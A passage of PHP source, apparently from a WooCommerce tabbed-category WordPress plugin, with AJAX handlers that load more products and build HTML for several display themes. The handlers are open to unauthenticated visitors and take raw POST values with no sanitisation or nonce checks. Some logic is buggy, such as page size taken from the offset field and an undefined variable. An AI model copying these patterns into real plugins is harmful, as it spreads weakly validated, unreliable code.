                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
            } else if ($average <= 5) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
            }
            $html .= '</div>';

        endif;

        $html .= '<h3 style="font-size: ' . get_option('product_content_text_size') . 'px;color:' . get_option('product_content_text_color') . '">';
        if (get_option('display_price') == 1):
            $html .= $product->get_price_html();
        endif;

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

            $html .= '</h3>';
        if (get_option('add_cart_link') == 1):
            if ($product_stock_status != 'outofstock') {
                if (!empty($add_to_cart_text)) {
                    $anchorText = esc_html($add_to_cart_text, 'woo-tabbed-category' );
                } else {
                    $anchorText = esc_html('Add To Cart', 'woo-tabbed-category' );
                }



                    if ($product->get_type() != 'variable'):
                    if (get_option('add_quantity_select') == 1):

                         $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= ' <div class="qc_quantity">';
                        $html .= '<input class="qc_minus" type="button" value="-">           
                        <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity"  value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                        <input class="qc_plus" type="button" value="+">';

                    }else{

                        $html .= ' <div class="qc_quantity">';
                        $html .= '<input class="qc_minus" type="button" value="-">           
                        <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                        <input class="qc_plus" type="button" value="+">';
                    }

                    endif;

                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple qc-cart-btn woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="qc-cart-btn woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;
                    else:
                    $html .= '<a href="#" class="qc-cart-btn woo_tab_product_details" product-id="'. $product->get_id() .'" > <i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i> </a>';

                    endif; 
                 $html .= '</div>';

                $html .= '</div>';

            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }

                $html .= '</div>';


            } else {
                $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="#"
                                               class="qc-cart-btn">Out Of Stock</a>';
            }
        endif;

        $html .= '</li>';
    endwhile;

    wp_reset_query();

    $response = array(


        'show_per_page' => $show_per_page,
        'product_num' => $products_num,
        'html' => $html,
        'offset' => $nextOffset
    );
    echo wp_send_json($response);
    wp_die();

}

//Load more product for theme ten
add_action('wp_ajax_woo_load_more_theme_ten', 'qcld_wootab_woo_load_more_theme_ten');
add_action('wp_ajax_nopriv_woo_load_more_theme_ten', 'qcld_wootab_woo_load_more_theme_ten');


function qcld_wootab_woo_load_more_theme_ten()
{


    $show_per_page = get_option('product_number');
    $cat_id = $_POST['product_cat_id'];
    $offset = $_POST['offset'];


    $args = array(
        'post_type' => 'product',
        'post_status' => 'publish',
        'offset' => $offset,
        'posts_per_page' => $show_per_page,
        'tax_query' => array(
            'relation' => 'OR',
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $cat_id,
                'operator' => 'IN'
            ),
        )
    );

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }

    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }

    $product_query = new WP_Query($args);
    $wc_pf = new WC_Product_Factory();

    $products_num = $product_query->post_count;
    if ($products_num == $show_per_page) {
        $nextOffset = intval($offset + $show_per_page);
    } else {
        $nextOffset = -1;
    }
    $html = '';

    while ($product_query->have_posts()) : $product_query->the_post();
        $product = wc_get_product(get_the_ID());
        $product_stock_status = $product->get_stock_status();
        $html .= '<li>
                                    <div class="product-box">
                                        <div class="product-img">' . $product->get_image('shop_catalog') . '</div>';

        if ($product->is_on_sale()):
            $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
        endif;

        if (get_option('product_title') == 1):
            $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
        endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
        $average = $product->get_average_rating();

        if (get_option('display_rating') == 1):
            if ($average == 1) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
            } else if ($average == 0) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
            } else if ($average <= 2) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
            } else if ($average <= 3) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
            } else if ($average <= 4) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
            } else if ($average <= 5) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
            }
        endif;

        $html .= '<div class="product-bottom">';
        if (get_option('display_price') == 1):

            $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
        endif;


        $html .= '<div class="qc_quantity">';


        if (get_option('add_quantity_select') == 1):

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity"  value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                        <input class="qc_plus" type="button" value="+">';

                    }else{

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="1">
                        <input class="qc_plus" type="button" value="+">';
                    }

        endif;


        if (get_option('add_cart_link') == 1):

       
            $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                    if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                        $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    else:
                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    endif;

        endif;
        $html .= '<div class="clear"></div></div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
        $html .= '</div>';
    endwhile;
    wp_reset_query();
    $response = array(


        'show_per_page' => $show_per_page,
        'product_num' => $products_num,
        'html' => $html,
        'offset' => $nextOffset
    );
    echo wp_send_json($response);
    wp_die();

}



//Load more product for theme two
add_action('wp_ajax_woo_load_more_all_tab', 'qcld_wootab_woo_load_more_all_tab');
add_action('wp_ajax_nopriv_woo_load_more_all_tab', 'qcld_wootab_woo_load_more_all_tab');


function qcld_wootab_woo_load_more_all_tab()
{


    $show_per_page = $_POST['offset'];
    $theme_id = $_POST['theme_id'];
    $offset = $_POST['offset'];
    $show_sale = $_POST['show_sale'];
    $feature_only = $_POST['feature_only'];
    $sorting_val = $_POST['sorting_val'];
    $qc_shortcode_parameters = $_POST['data_cat_parameter'];
    $link_title_to_modal = $_POST['link_title_to_modal'];
    $product_tag = $_POST['data_tag'];

    $sorting = '';
    $orderBy = get_option('qc_product_sort_type');
    if(get_option('qc_product_sort_type') == 'meta_value_num'){
        $sorting = '_price';
    }
    if( get_option('qc_product_sort_type') == 'total_sales' ){
        $sorting = 'total_sales';
        $orderBy = 'meta_value_num';
    }


    $tax_query = array(
        array(
            'taxonomy' => 'product_visibility',
            'field' => 'name',
            'terms' => 'featured',
            'operator' => 'IN'
        ),);

        $show_sale_products_only = array('relation' => 'OR', array(
            // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
        array(
            // Variable products type
            'key' => '_min_variation_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ));


    
    $product_categories = unserialize(get_option('selected_categories'));

    $category_orders = get_option('category_order');
    if($category_orders == 'menu_order'){
        $args = array(
        'hide_empty'    => 1,
        'order'         => 'asc',
        'exclude'       => $product_categories,
        'include'       => $category_ids,
        );

    }else{

         $args = array(
        'hide_empty'    => 1,
        'order'         => get_option('category_order'),
        'orderby'       => 'title',
        'exclude'       => $product_categories,
        'include'       => $category_ids,
        );

    }
    $product_categoriess = get_terms('product_cat', $args);

    $categories_all = '';

    if (!empty($qc_shortcode_parameters) ) {
        $category_ids = $qc_shortcode_parameters;
        $categories_all = explode(',', $category_ids);

    }else {
        $categories_all = array();
        foreach($product_categories as $termss){
            array_push($categories_all,$termss->term_id);
        }
    }

    if($sorting_val == 'popularity'){
            $args = array(
                'post_type'         => 'product',
                'post_status'       => 'publish',
                'posts_per_page'    => $show_per_page,
                'offset'            => $offset,
                'meta_key'          => 'total_sales',
                'orderby'           => 'meta_value_num',
                'order'             => 'DESC',
                //'orderby_meta_key'  => 'total_sales',
                'tax_query' => array(
                    'relation' => 'OR',
                    array(
                        'taxonomy' => 'product_cat',
                        'field' => 'term_id',
                        'terms' => $categories_all,
                        'operator' => 'IN'
                    ),
                )
            );
        }else if($sorting_val == 'rating'){
            $args = array(
                'post_type'         => 'product',
                'post_status'       => 'publish',
                'posts_per_page'    => $show_per_page,
                'offset'            => $offset,
                'meta_key'          => '_wc_average_rating',
                'orderby'           => 'meta_value_num',
                'order'             => 'DESC',
                'tax_query' => array(
                    'relation' => 'OR',
                    array(
                        'taxonomy' => 'product_cat',
                        'field' => 'term_id',
                        'terms' => $categories_all,
                        'operator' => 'IN'
                    ),
                )
            );
        }else if($sorting_val == 'date'){
            $args = array(
                'post_type'         => 'product',
                'post_status'       => 'publish',
                'posts_per_page'    => $show_per_page,
                'offset'            => $offset,
                'orderby'           => 'date',
                'order'             => 'DESC',
                'tax_query' => array(
                    'relation' => 'OR',
                    array(
                        'taxonomy' => 'product_cat',
                        'field' => 'term_id',
                        'terms' => $categories_all,
                        'operator' => 'IN'
                    ),
                )
            );
        }else if($sorting_val == 'price'){
            $args = array(
                'post_type'         => 'product',
                'post_status'       => 'publish',
                'posts_per_page'    => $show_per_page,
                'offset'            => $offset,
                'meta_key'          => '_price',
                'orderby'           => 'meta_value_num',
                'order'             => 'ASC',
                'tax_query' => array(
                    'relation' => 'OR',
                    array(
                        'taxonomy' => 'product_cat',
                        'field' => 'term_id',
                        'terms' => $categories_all,
                        'operator' => 'IN'
                    ),
                )
            );
        }else if($sorting_val == 'price-desc'){
            $args = array(
                'post_type'         => 'product',
                'post_status'       => 'publish',
                'posts_per_page'    => $show_per_page,
                'offset'            => $offset,
                'meta_key'          => '_price',
                'orderby'           => 'meta_value_num',
                'order'             => 'DESC',
                'tax_query' => array(
                    'relation' => 'OR',
                    array(
                        'taxonomy' => 'product_cat',
                        'field' => 'term_id',
                        'terms' => $categories_all,
                        'operator' => 'IN'
                    ),
                )
            );
        }else{


  

          $args = array(
                'post_type'             => 'product',
                'post_status'           => 'publish',
                'posts_per_page'        => $show_per_page,
                'offset'                => $offset,
                'meta_key'              => $sorting,
                'orderby'               => $orderBy,
                'order'                 => get_option('qc_product_sort_order'),
                'tax_query'             => array(
                                        'relation' => 'OR',
                                        array(
                                            'taxonomy' => 'product_cat',
                                            'field' => 'term_id',
                                            'terms' => $categories_all,
                                            'operator' => 'IN'
                                ),
                            )
                        );
        }





    if ($show_sale == 1) {
        $args = array_merge($args, array('meta_query' => $show_sale_products_only));
    }


    if ($feature_only == 1) {

        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $categories_all,
                'operator' => 'IN'
            ),
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));
        $args = array_merge($args, array('tax_query' => $tax_query));
    }

    $args =  array_merge($args, array( 'tax_query' => array(
                            array(
                                'taxonomy' => 'product_visibility',
                                'field'    => 'name',
                                'terms'    => 'exclude-from-catalog',
                                'operator' => 'NOT IN',
                            ),
                    )));

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));

    }


    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }

    if(!empty($product_tag)){

         $args = array(
                'post_type'             => 'product',
                'post_status'           => 'publish',
                'posts_per_page'        => $show_per_page,
                'offset'                => $offset,
                'product_tag'           => $product_tag,
                'meta_key'              => $sorting,
                'orderby'               => $orderBy,
                'order'                 => get_option('qc_product_sort_order'),
                'tax_query'             => array(
                                        'relation' => 'AND',
                                        array(
                                            'taxonomy' => 'product_cat',
                                            'field' => 'term_id',
                                            'terms' => $categories_all,
                                            'operator' => 'IN'
                                ),
                            )
                        );

    }

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }


    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }


    $product_query = new WP_Query($args);
    $wc_pf = new WC_Product_Factory();
    $products_num = $product_query->post_count;
    if($products_num == $show_per_page) {
        $nextOffset = intval($offset + $show_per_page);
    }else{
        $nextOffset = -1;
    }
    $html = '';


    if ($theme_id == 'theme-one') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'"><div class="product-box"><div class="product-img">';
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<a href="#" class="woo_tab_product_details" product-id="'.get_the_ID().'">';
            }else{
                $html .= '<a href="'. $product->get_permalink() .'">';
            }
            $html .= $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()). '</a><div class="one-description">'. strip_tags(substr(get_the_excerpt(get_the_ID()), 0, 150), '<br>').'</div></div>';
            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;

            if (get_option('product_title') == 1):

            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.get_the_ID().'">' . $product->get_title() . '</a></h2>';
            }else{
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }
            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
            endif;

            $html .= '<div class="product-bottom">';
            if (get_option('display_price') == 1):

                $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
            endif;


            $html .= '<div class="qc_quantity qc_qat_style_one">';

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

            if (get_option('add_quantity_select') == 1):
                if ($product_stock_status != 'outofstock'):
                if ($product->get_type() != 'variable'):

                         $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                        <input class="qc_plus" type="button" value="+">';

                    }else{

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="1">
                        <input class="qc_plus" type="button" value="+">';
                    }


                endif;
                endif;
            endif;
            if (get_option('add_cart_link') == 1):
                if ($product_stock_status != 'outofstock') {

                    if ($product->get_type() != 'variable'){
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;

                    }else{

                        $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }



                } else {
                    $html .= '<a class="product_out_of_stock" href="#"><i class="fa" aria-hidden="true"></i></a>';
                }


            endif;


            $html .= '</div >';

            $html .= '<div class="clear"></div></div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div></li>';
        endwhile;
    } else if ($theme_id == 'theme-two') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'"><div class="product-box"><div class="product-img">';
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<a href="#" class="woo_tab_product_details" product-id="'.get_the_ID().'">';
            }else{
                $html .= '<a href="'. $product->get_permalink() .'">';
            }
            $html .= $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()).'</a></div>';

            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;

            if (get_option('product_title') == 1):

            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.get_the_ID().'">' . $product->get_title() . '</a></h2>';
            }else{
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }

            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
            endif;

            $html .= '<div class="product-bottom">';
            if (get_option('display_price') == 1):

                $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
            endif;


            $html .= '<div class="qc_quantity qc_qat_style_two">';

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 
            if (get_option('add_quantity_select') == 1):
                if ($product_stock_status != 'outofstock'):
                if ($product->get_type() != 'variable'):

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                        <input class="qc_plus" type="button" value="+">';

                    }else{

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="1">
                        <input class="qc_plus" type="button" value="+">';
                    }


                endif;
                endif;
            endif;
            if (get_option('add_cart_link') == 1):
                if ($product_stock_status != 'outofstock') {

                    if ($product->get_type() != 'variable'){
                        
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;

                    }else{

                        $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }



                } else {
